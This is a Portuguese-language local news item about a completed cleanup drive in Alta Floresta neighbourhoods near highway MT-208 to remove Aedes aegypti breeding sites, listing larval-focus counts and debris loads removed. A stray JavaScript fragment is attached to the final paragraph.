Capa / Cidades / Finalizado Mutirão na MT-208

Finalizado Mutirão na MT-208

ESSA TAMBÉMAssessoria da PMAF

O Mutirão de Limpeza, que teve início no Bairro Jardim Panorama e foi realizado em mais sete Bairros de Alta Floresta, terminou na última sexta-feira, 22, sendo concluído no Jardim Universitário, todos estes localizados próximos a Rodovia MT- 208.
A Força Tarefa realizada pela Prefeitura de Alta Floresta, juntamente com a Secretaria de Saúde, Secretaria Municipal de Infraestrutura e Vigilância Epidemiológica Ambiental tem o propósito de trabalhar com o mesmo objetivo, combater os focos do mosquito Aedes Aegypti, causador das doenças Dengue , Zika Vírus e Chikungunya.
No entanto, no Plano Emergencial de Enfrentamento a Microcefalia, a equipe de agentes, sob a coordenação de Silvio Cardoso, em parceria com a Secretaria de Obras, realizou o trabalho de pesquisa vetorial através de visitas domiciliares para a localização e remoção de possíveis focos e criadouros do mosquito. Além de educar a população na saúde, com orientações de prevenção ao vetor da doença.
De acordo com os dados fornecidos pela Vigilância Ambiental, foi encontrado no Jardim Panorama, primeiro Bairro em que a limpeza foi realizada, 33 focos larvais, no Renascer foram encontrados 22, no Primavera, 35, no Jardim das Oliveiras, foram encontrados 15 focos, no Jardim Tropical, 0,6 focos, no Parque dos Oitis, foram encontrados 0,7, no Residencial Mangueira, 10 focos larvais, por fim, no Residencial Universitário foram encontrados 26 focos, todos foram retirados e removidos pelos agentes de endemias.
No total, foram retiradas, pela Secretaria de Obras e Infraestrutura, mais de 320 cargas de entulhos nos bairros da região próxima a MT-208.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top